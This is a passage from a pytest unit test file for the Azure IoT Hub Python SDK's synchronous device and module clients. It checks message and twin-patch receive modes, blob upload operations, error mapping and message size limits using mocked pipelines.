"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox._put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
################
# DEVICE TESTS #
################
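# The device test classes below combine IoTHubDeviceClientTestsConfig with the shared test mixins defined above.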
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control of a callback is required.
"""
return IoTHubDeviceClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the MQTTPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_c2d_message_received is not None
assert (
client._mqtt_pipeline.on_c2d_message_received == client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSymmetricKeyTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.C2D_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
) # Note: the return value being checked here is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubDeviceClientPROPERTYOnMessageReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.C2D_MSG
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubDeviceClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubDeviceClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .connected")
class TestIoTHubDeviceClientPROPERTYConnected(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubDeviceClientOCCURANCEConnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubDeviceClientOCCURANCEDisconnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control of a callback is required.
"""
return IoTHubModuleClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the MQTTPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_input_message_received is not None
assert (
client._mqtt_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_message' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, mqtt_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
assert mqtt_pipeline.send_output_message.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_output_message
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_output_message,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, mqtt_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_to_output_data_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia" * 256000
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_to_output_size_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 256000
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_to_output_data_equal_to_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Input Messages will appear disabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.INPUT_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
